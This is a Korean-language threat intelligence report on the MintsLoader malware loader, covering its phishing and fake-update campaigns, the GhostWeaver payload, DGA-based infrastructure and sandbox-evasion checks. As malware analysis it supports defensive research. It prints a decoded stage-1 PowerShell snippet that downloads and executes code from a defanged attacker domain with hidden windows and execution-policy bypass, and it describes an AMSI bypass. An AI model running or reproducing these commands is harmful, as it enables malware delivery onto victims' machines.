Recorded Future Malware Intelligence Hunting을 통해 MintsLoader 발견
Executive Summary
MintsLoader라는 악성 로더는 2024년 초에 여러 피싱 및 드라이브 바이 다운로드 캠페인에서 처음 발견되었습니다. 로더는 일반적으로 GhostWeaver, StealC, 수정된 BOINC(Berkeley Open Infrastructure for Network Computing) 클라이언트와 같은 2단계 페이로드를 배포합니다. MintsLoader는 난독화된 JavaScript 및 PowerShell 스크립트를 사용하는 다단계 감염 체인을 통해 작동합니다. 이 멀웨어는 샌드박스 및 가상 머신 회피 기법, 도메인 생성 알고리즘(DGA), HTTP 기반 명령 및 제어(C2) 통신을 사용합니다.
MintsLoader는 여러 위협 그룹에 의해 사용되는 것으로 관찰되었습니다. 그러나 TAG-124(일명 LandUpdate808)의 운영자들은 이를 광범위하게 사용했습니다. 로더는 산업, 법률, 에너지 부문을 대상으로 하는 피싱 이메일(TAG-124), 브라우저 업데이트 프롬프트를 사칭하는 손상된 웹사이트(SocGholish), 이탈리아의 PEC 인증 이메일 시스템을 통해 배포되는 송장 테마의 유인물 등 여러 감염 벡터를 통해 배포됩니다.
MintsLoader는 난독화를 사용하여 YARA 규칙과 같은 정적 감지를 복잡하게 만들고, DGA 기반 C2 인프라 사용은 최신 감시 목록이나 차단 목록을 유지하기 어렵게 하며, 분석 방지 기술은 샌드박스나 가상화를 이용하는 호스트 기반 감지를 복잡하게 만듭니다. 그러나 Recorded Future의 Malware Intelligence Hunting은 새로운 MintsLoader 샘플 및 관련 C2 도메인을 식별하고, 차단 목록 또는 위협 헌팅을 위한 최신 목록을 제공합니다.
MintsLoader는 난독화, 샌드박스 회피 및 적응형 인프라를 지속적으로 사용하여 멀웨어 생태계 내에서 계속 유지될 가능성이 높으며, 이로 인해 추가적인 위협 행위자에 의한 사용이 증가할 수 있습니다. 멀웨어가 다양한 전달 메커니즘으로 이용되는 것은 사이버 범죄 커뮤니티 내에서 점점 더 전문화되고 특화되고 있음을 반영합니다. 이러한 정교함의 증가로 보다 탄력적이고 효율적인 운영이 가능해져 위협 행위자에게 이점이 있지만, 동시에 방어자에게는 악의적인 활동을 보다 효과적으로 그리고 대규모로 식별하고 차단할 수 있는 기회를 제공할 수 있습니다.
주요 연구 결과
- MintsLoader의 2단계 PowerShell 스크립트는 샌드박스 및 가상 환경 회피 기술을 사용하여 자동화된 분석에 대한 취약성을 줄이고 동적 탐지 도구를 우회할 가능성을 높입니다.
- 시스템 날짜를 기준으로 일일 C2 도메인을 생성하기 위해 MintsLoader가 DGA를 사용하면 인프라 모니터링 활동과 도메인/IP 기반 탐지가 복잡해집니다.
- Recorded Future의 Malware Intelligence Hunting은 동적 인프라로 인해 추적하기 어려운 MintsLoader와 관련된 최신 C2 도메인 및 기타 아티팩트를 제공합니다.
- Insikt Group에 따르면 GhostWeaver는 관찰된 캠페인 전반에 걸쳐 MintsLoader에 의해 배포된 주요 페이로드입니다.
- GhostWeaver의 자체 서명된 X.509 인증서는 AsyncRAT 및 그 변종의 인증서와 유사하여 초기에는 AsyncRAT와 같은 다른 멀웨어 계열과 잘못 연결될 수 있습니다.
배경
오렌지 사이버디펜스는 2024년 7월부터 10월까지 진행된 대규모 배포 캠페인을 통해 MintsLoader를 처음 탐지했습니다. Insikt Group은 Palo Alto의 Unit42가 SocGholish 감염에 대한 분석을 바탕으로 2024년 2월에 진행된 이전 캠페인을 식별했습니다.
로더는 JavaScript(단계 1)와 PowerShell(단계 2) 스크립트로 구성되며, 이는 다중 DGA 기반 도메인에서 다운로드됩니다. "MintsLoader"라는 이름은 URL 매개변수 s=mints[NUMBER] (예: s=mints11)의 독특한 사용에서 유래되었습니다. MintsLoader는 일반적으로 GhostWeaver, StealC 및 Berkeley Open Infrastructure for Network Computing (BOINC) 클라이언트와 같은 보조 페이로드를 전달하는 캠페인에서 관찰됩니다.
MintsLoader는 여러 위협 행위자들에 의해 사용되는 것으로 추정되지만, TAG-124(LandUpdate808로도 알려져 있음) 감염 사례에서 MintsLoader가 자주 배포되는 것이 관찰되었습니다. 또한, SocGholish를 사용하는 위협 행위자들은 MintsLoader의 초기 채택자였으며, 이로 인해 MintsLoader 캠페인이 SocGholish와 독점적으로 연관되어 있다는 초기 평가가 이루어졌습니다. 예를 들어, 2024년 2월 Palo Alto의 Unit42는 SocGholish와 관련된 지표(그림 2)를 공개했습니다. 그러나 Insikt Group의 분석에 따르면, AsyncRAT를 배포하는 것으로 식별된 URL들은 알려진 MintsLoader URL 패턴과 일치합니다.
同様に, 2024년 7월 Huntress Labs는 SocGholish 감염이 BOINC 클라이언트를 배포했다고 보고했습니다. 특히, BOINC를 다운로드하는 데 사용된 URL은 알려진 MintsLoader URL 패턴과 일치합니다. 그림 3은 MintsLoader를 사용하는 위협 행위자의 고수준 개요를 보여줍니다.
아래는 최근 보고된 MintsLoader 관련 캠페인입니다.
MintsLoader 및 Kongtuke/ClickFix 페이지
2025년 초, 보안 분석가들은 MintsLoader를 첫 번째 단계 로더로 배포하는 피싱 캠페인을 관찰했습니다. 피싱 이메일(미국과 유럽의 에너지, 석유 및 가스, 법률 분야를 대상으로 한)은 악성 JavaScript 첨부 파일이나 가짜 "클릭하여 확인" 웹 페이지로 연결되는 링크를 포함하고 있었습니다. 그림 4는 ClickFix 페이지의 예시를 보여줍니다.
두 경우 모두, 결과는 피해자의 시스템에서 MintsLoader의 PowerShell 기반 두 번째 단계가 실행되는 것이었습니다. 이 로더는 최종 페이로드들을 다운로드했으며, 특히 StealC 정보 유출 악성코드와 수정된 BOINC 클라이언트 빌드가 포함되었습니다. 이 캠페인은 가짜 CAPTCHA 인증 페이지(ClickFix/KongTuke 유인물)를 활용해 사용자를 속여 복사된 PowerShell 명령어를 실행하도록 유도했으며, 이 명령어는 MintsLoader를 다운로드하고 실행했습니다(그림 5).
이 캠페인에서 다른 감염 경로는 다운로드된 ‘Fattura########.js’를 통해 MintsLoader를 전달했습니다. 파일(이탈리아어로 "청구서"를 의미함)을 피해자가 열었으며, 이로 인해 동일한 PowerShell 로더가 실행되었습니다. eSentire의 위협 대응 팀 연구원들은 이 캠페인을 보고했으며, 위협 행위자들이 북미와 유럽 지역에서 산업 및 전문 서비스 분야를 주요 표적으로 삼고 있음을 지적했습니다.
SocGholish "FakeUpdates" 캠페인
여러 보고서에 따르면 (1, 2) SocGholish (FakeUpdates) 위협 행위자들이 MintsLoader를 그들의 운영에 통합했습니다. 2024년 7월경부터 해킹된 웹사이트를 통해 유포된 SocGholish 감염 사례에서, MintsLoader를 통해 BOINC 분산 컴퓨팅 클라이언트를 설치하는 감염 체인이 확인되었습니다.
그림 6에 표시된 이 드라이브 바이 캠페인에서, 합법적이지만 손상된 사이트를 탐색하는 피해자들은 가짜 브라우저 업데이트 프롬프트(주로 update.js 스크립트에서 유래)를 접하게 됩니다. 이를 실행할 경우, 악성 JavaScript는 난독화된 MintsLoader 페이로드를 가져와 다단계 PowerShell 시퀀스를 시작합니다.
Huntress Labs는 두 가지 병렬 결과를 문서화했습니다. 한 경로는 메모리에서 파일리스 AsyncRAT가 실행되는 결과를 낳았고, 다른 경로는 공격자의 통제 하에 스텔스 BOINC 설치로 이어졌습니다. BOINC 배포는 표준 BOINC 서버가 아닌 악성 C2에 연결하도록 수정 및 구성되었습니다.
일부 경우, Mandiant에서 UNC4108로 추적된 GhostWeaver PowerShell 백도어가 MintsLoader를 통해 배포되어 공격자에게 지속적인 접근 권한과 추가 플러그인을 로드할 수 있는 플랫폼을 제공했습니다.
유럽의 송장 피싱
2024년 말에 진행된 또 다른 MintsLoader 캠페인은 유럽의 조직을 대상으로 청구서 테마의 피싱 이메일을 통해 공격을 수행했습니다. 이 중 한 예시는 그림 7에 표시되어 있습니다. 스팸 메시지는 이탈리아의 PEC(인증 이메일) 시스템을 활용해 신뢰성을 부여하고, 수신자들이 청구서로 위장된 첨부된 JavaScript 파일을 열도록 유인했습니다. 스팸하우스 연구팀은 이 공격을 "PEC 청구서 사기"라고 명명하고, 공격자들이 신뢰할 수 있는 이메일 채널을 악용해 보안 검사를 우회한 방법을 강조했습니다. 이 캠페인은 "기업으로부터 시간, 돈, 그리고 신뢰를 빼앗았다"는 점에서 주목을 받았습니다.
기술 분석
MintsLoader는 JavaScript와 PowerShell을 포함하는 다단계 실행 체인을 사용합니다. 각 단계는 분석을 방해하기 위해 난독화를 사용합니다. MintsLoader는 보조 기능 없이 로더로만 작동하지만, 주요 강점은 샌드박스 및 가상 머신 회피 기술, 그리고 실행 날짜에 따라 C2 도메인을 파생시키는 DGA 구현에 있습니다. 이러한 기능은 정적 분석과 호스트 기반 탐지를 상당히 복잡하게 만듭니다. 그러나 C2 통신은 HTTP를 통해 이루어져서, 새 샘플을 탐지하고 식별하는 데 신뢰할 수 있는 벡터를 제공합니다. 그림 8은 MintsLoader의 주요 기능을 소개합니다.
MintsLoader에 대한 이 분석에는 1단계 및 2단계 페이로드와 MintsLoader 인프라에 대한 세부 정보가 포함되어 있습니다.
MintsLoader 공격 체인
MintsLoader는 일반적으로 KongTuke 또는 ClickFix 페이지 링크가 포함된 피싱 이메일을 통해 전달됩니다. 이 페이지가 실행되면 JavaScript의 첫 번째 단계를 가져와 실행합니다. JavaScript는 심하게 난독화되어 있으며, 실행 시 그림 9에 표시된 대로 MintsLoader의 두 번째 단계를 다운로드하고 실행하기 위해 PowerShell 명령을 실행합니다.
두 번째 단계에서는 환경 검사를 수행하여 샌드박스와 가상화 환경 중 어디에서 실행 중인지 확인합니다. 다음으로, 스크립트는 DGA를 사용하여 다음 C2 도메인을 생성합니다. 그런 다음 MintsLoader는 생성된 도메인에 연결하여 GhostWeaver, StealC 또는 BOINC 클라이언트와 같은 최종 페이로드를 다운로드하려고 시도합니다. 그림 10은 이 공격 체인의 대략적인 개요를 보여줍니다.
1단계: JavaScript
MintsLoader의 초기 단계는 두 번째 단계를 검색하기 위해 PowerShell 명령을 실행하는 JavaScript 파일로 구성됩니다. 스크립트는 정크 주석, 읽을 수 없는 변수 및 함수 이름, 문자 대체, 문자열 인코딩을 사용하여 심하게 난독화되어 있습니다 (그림 11). Insikt Group은 Recorded Future Malware Intelligence Hunting에서 파생된 데이터를 사용하여 141개의 MintsLoader 1단계 샘플을 발견했습니다 (부록 A).
첫 번째 단계의 JavaScript 페이로드의 핵심 기능은 PowerShell 명령어를 실행하여 ‘curl -useb http://[domain]/1.php?s=[campaign]’ 명령어를 실행하는 것입니다. 이 명령어는 두 번째 단계를 다운로드하고 실행합니다. PowerShell에서 'curl' 명령어를 '-useb' 옵션과 함께 사용할 경우, 이는 Invoke-WebRequest의 별칭으로 작동하며, 실제 HTTP 요청은 cURL 프로그램이 아닌 Invoke-WebRequest를 통해 수행됩니다.
Insikt Group은 1단계 로더의 세 가지 버전을 식별했으며, 모두 동일한 JavaScript 난독화 기술을 사용하지만 배포된 PowerShell의 구현 방식에는 차이가 있습니다.
첫 번째 변형은 그림 12에 표시된 대로 C2 도메인이 하드코딩된 상태에서 평문으로 PowerShell 명령을 실행합니다. 이 변형은 "mints13" 및 "flibabc11" 캠페인에서 관찰됩니다.
두 번째 변형에서는 문자 대체를 사용하여 PowerShell 명령이 난독화됩니다. C2 도메인은 여전히 하드코딩되어 있으며 curl 명령의 별칭이 대신 사용되지만, 목표는 여전히 다음 단계를 다운로드하는 것입니다(그림 13). 캠페인 전반에 걸쳐 가장 널리 사용되는 변형은 "flibabc21", "flibabc22", "mints11", "mints13", "mints21" 및 "mints42"입니다.
세 번째 변형은 명령을 Base64로 인코딩합니다(그림 14). Insikt Group은 이전 캠페인 “mints13”에서 이 방법이 사용된 것을 확인했습니다.
그러나 이 버전에서는 PowerShell 명령이 cURL을 통해 두 번째 단계를 다운로드하기 위한 PowerShell 명령을 포함하는 파일을 생성합니다. 그 후 파일을 실행하고 삭제합니다.
$randomNamePart1 = -join ((48..57) + (97..122) | Get-Random -Count 5 | % { [char]$_ });
$currentTimeHour = [int](Get-Date -Format HH);
$currentTimeMinute = [int](Get-Date -Format mm);
$minuteAdjustment = 3;
If ($currentTimeMinute + $minuteAdjustment -gt 59) {
$currentTimeHour = $currentTimeHour + 1;
$currentTimeMinute = $currentTimeMinute + $minuteAdjustment - 60;
} Else {
$currentTimeMinute = $currentTimeMinute + $minuteAdjustment;
};
$currentTimeHour = If (([int](Get-Date -Format HH) + 1) -gt 23) { "00" } Else { $currentTimeHour };
$randomNamePart2 = -join ((65..90) + (97..122) | Get-Random -Count 12 | % { [char]$_ });
$scriptToExecute = @"
$ErrorActionPreference = "Continue"
curl -useb "http://gibuzuy37v2v\[.]top/1.php?s=mints13" | iex;
Remove-Item "C:\Users\Public\Documents\$($randomNamePart2).ps1" -Force
"@;
"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c $($scriptToExecute)" | Out-File -FilePath "C:\Users\Public\Documents\$($randomNamePart2).ps1";
powershell -noprofile -executionpolicy bypass -WindowStyle hidden -File "C:\Users\Public\Documents\$($randomNamePart2).ps1";
Remove-Item "$env:APPDATA\*.ps1" -Force
Remove-Item "$env:APPDATA\*.bat" -Force
표 1: base64로 인코딩된 1단계 PowerShell 명령의 디코딩(출처: Recorded Future)
1단계 C2 통신
어떤 변형을 실행하더라도 하드코딩된 도메인으로 2단계 페이로드를 검색하기 위한 HTTP GET 요청이 발생합니다. 요청이 성공하면 그림 15에 표시된 PowerShell 스크립트를 검색하고 실행합니다.
DGA 도메인이 더 이상 유효하지 않으면 그림 16에 표시된 대로 302 응답이 반환됩니다.
2단계 PowerShell
두 번째 단계인 PowerShell에는 Base64로 인코딩된 문자열이 포함되어 있습니다. XOR 디코딩 및 압축 해제 후, 난독화된 기본 페이로드가 생성됩니다. 그림 17은 이 페이로드의 일부를 보여주며, MintsLoader의 난독화된 문자열 구성 기법을 설명합니다.
초기 난독화 해제 및 디코딩 후, PowerShell의 두 번째 단계는 알려진 기술을 사용하여 Antimalware Scan Interface (AMSI)를 우회하려고 시도합니다. 이 기술은 AMSI 초기화 실패를 위장하기 위해 System.Management.Automation.AmsiUtils 객체의 amsiInitFailed 변수를 TRUE로 설정하는 방식입니다.
나머지 코드는 세 가지 시스템 정보 쿼리를 실행하는 역할을 합니다. 이 쿼리의 반환 값은 논리적 표현식에서 시스템이 베어 메탈, 샌드박스, 또는 가상 머신에서 실행 중인지 판단하는 데 사용됩니다. 이 정보는 URL 매개변수 키로 전송되는 정수 변수를 통해 C2에 전달되며, C2는 해당 값을 확인하여 응답으로 최종 페이로드를 다운로드하는 세 번째 단계나 미끼를 반환할지 결정합니다. 참고로, 키 변수를 증가시키는 데 사용되는 상수 정수 값은 각 2단계 샘플링 시마다 변경됩니다.
각 시스템 정보 쿼리의 결과는 세 개의 논리 표현식과 비교되며, 이 논리 표현식의 순서는 샘플마다 다릅니다. 또한 키를 증가시키는 상수들이 포함되며, 이 결과는 키 변수의 값에 영향을 미칩니다. 논리적 표현은 초기 검토 시 명확한 결과를 제공하지 않을 수 있습니다. 예를 들어, 아래 그림 18에 표시된 첫 번째 디오브퓨스케이션된 시스템 체크가 가상 머신에서 실행된다면, $isVirtualMachine 변수는 $true와 동일하게 설정됩니다. 논리 표현식 "$true -eq 3" 는 PowerShell에서 $true로 평가되며, 키를 83670406277 대신 15310805757로 증가시킵니다.
두 번째 시스템 점검은 Win32_VideoController WMI 객체의 AdapterDACType 멤버를 쿼리하여 디지털-아날로그 변환기(DAC) 칩의 이름 또는 식별자를 획득합니다. 이는 그림 19에 표시되어 있습니다. 이 설정은 감염된 시스템이 에뮬레이터나 가상 환경에서 실행 중인지 여부를 결정합니다. 일반적으로 Windows 시스템은 " "" "Internal" " 및/또는 " "" "Integrated RAMDAC" "" "를 반환하며, 이 예시에서는 키가 14467965888만큼 증가합니다.
세 번째 시스템 점검은 Win32_CacheMemory WMI 객체의 목적 멤버를 쿼리합니다. 이 값은 일반적인 Windows 시스템에서 " "L1 Cache"로 표시됩니다." 비명시적 논리 표현식 "$l1CachePurpose.length —gt 4" 는 최적의 경우에 실행되며, 그림 20에 표시된 디오브퓨스케이션된 예제에서 키 값을 27424330481 증가시킵니다.
시스템은 키의 검증 및 계산 후, 날짜와 상수 값을 기반으로 무작위 시드(seed)를 생성합니다. 이 시드는 시스템.Random 객체와 함께 간단한 DGA(Domain Generation Algorithm)를 사용하여 도메인을 구성하고, URL 경로를 생성하는 데 사용됩니다. 이는 그림 21에 표시되어 있습니다. 저자는 URL 경로를 생성할 때 두 번째 랜덤 변수를 사용하지 않아 오류가 발생했을 수 있습니다. 대신 그들은 URL 경로의 끝 부분을 정의되지 않은 변수로 사용합니다. 이로 인해 URL 경로의 끝 부분이 상수 "htr.php" 가 됩니다. 참고로 PowerShell에서 curl은 Invoke-WebRequest의 별칭으로, C2로 전송되는 요청을 생성하는 데 사용됩니다. 따라서 User-Agent HTTP 헤더에는 curl이 아닌 PowerShell 버전 정보가 포함됩니다.
2단계 C2 통신
그림 22는 최종 페이로드에 대한 MintsLoader 요청의 예시를 보여줍니다. 이 요청의 URL 경로는 htr.php로 끝납니다. URL 매개변수 id는 호스트 이름이며, URL 매개변수 s는 캠페인 ID입니다.
그림 23에는 세 번째 단계에 대한 이전 MintsLoader 요청의 예가 나와 있습니다. URL 경로가 무작위가 아닌 고정된 문자열 "2.php"로 되어 있습니다.
두 번째 단계 요청이 특정 요구사항을 충족하지 않을 경우, 최종 페이로드가 미끼 실행 파일(그림 24)로 이어질 수 있습니다. 이 예시에서처럼, 이는 사이트에서 temp[.]sh로 다운로드되는 AsyncRAT 미끼 실행 파일로 이어집니다. AsyncRAT와의 연관성은 보고서에서 초기 명명 및 네트워크 트래픽에 대한 일부 대응 조치로 ' "AsyncRAT Loader' (")로 지칭되게 되었습니다. 이로 인해 현재 MintsLoader 캠페인은 AsyncRAT를 배포하지 않음에도 불구하고, MintsLoader 악성 소프트웨어 샘플이 잘못된 태그로 AsyncRAT로 분류되는 문제가 발생했습니다.
그림 25에는 최근 있었던 성공적인 시도가 나와 있습니다. 이 예에서 최종 페이로드는 GhostWeaver입니다.
GhostWeaver
MintsLoader가 배포하는 가장 흔히 관찰되는 페이로드 중 하나는 GhostWeaver로, PowerShell 기반 원격 액세스 트로이목마(RAT)로, MintsLoader와 코드 유사성과 기능 중복을 보여줍니다. 특히, GhostWeaver는 sendPlugin 명령어를 통해 MintsLoader를 추가 페이로드로 배포할 수 있습니다. GhostWeaver와 명령 및 제어(C2) 서버 간의 통신은 PowerShell 스크립트 내에 직접 내장된 난독화된 자체 서명 X.509 인증서를 사용하여 TLS 암호화로 보호됩니다. 이 인증서는 C2 인프라에 대한 클라이언트 측 인증에 활용됩니다.
GhostWeaver는 주기적으로 AsyncRAT로 잘못 분류되어 왔습니다. Insikt Group은 중간 수준의 신뢰도로 이 분류 오류가 Palo Alto Networks가 처음 GhostWeaver 샘플을 식별한 과정에서 발생했다고 평가합니다 (SHA256: fb0238b388d9448a6b36aca4e6a9e4fbcbac3afc239cb70251778d40351b5765)를 파일리스 AsyncRAT 변종으로 분류한 것에서 비롯되었다고 평가합니다. GhostWeaver와 AsyncRAT은 자체 서명된 X.509 인증서 내에서 특정 특성을 공유합니다. 예를 들어, 동일한 만료 날짜와 시리얼 번호 길이 등이 해당됩니다. 그러나 이러한 유사성은 단순히 인증서 생성 방법의 공통점을 반영할 뿐, 의미 있는 운영상의 중복을 의미하지 않을 수 있습니다.
MintsLoader 인프라
Insikt Group은 처음에 MintsLoader C2 서버가 BLNWX에서만 호스팅되는 것을 발견했지만, 이후 Stark Industries Solutions Ltd(AS44477), GWY IT Pty Ltd(AS199959), SCALAXY-AS(58061) 등 다른 ISP의 사용이 증가하는 것을 관찰했습니다. SCALAXY-AS를 통해 발표된 MintsLoader C2 IP 주소는 호스팅 제공업체 3NT Solutions LLP와 IROKO Networks Corporation에 의해 운영되며, 두 업체 모두 러시아어를 사용하는 불법 활동 방조 호스팅 업체 Inferno Solutions(inferno[.]name) 산하입니다. SCALAXY-AS 및 Stark Industries Solutions로의 전환은 MintsLoader 운영자가 익명의 가상 사설 서버(VPS) 제공업체에 의존하던 것에서 벗어나 전통적인 불법 활동 방조 호스팅 업체로 전환한 것을 나타내며, 폐쇄 시도에 대비하여 인프라를 강화하고 운영 안정성을 높이기 위한 노력의 일환으로 보입니다.
지난 몇 달 동안 Insikt Group은 의심되는 추가 캠페인 ID와 페이로드를 식별했습니다(표 2). 이 데이터는 공개 연구와 Insikt Group의 내부 연구에서 수집되었습니다.
표 2: 의심되는 MintsLoader 캠페인 ID(출처: Recorded Future)
2023년에 추가로 두 개의 잠재적 캠페인 ID(js2 및 dav)가 관찰되었으며, 이 중 js2는 AsyncRAT 감염 사례에서 확인되었습니다.
전체 분석 내용을 읽으려면 여기를 클릭하여 PDF 보고서를 다운로드하세요.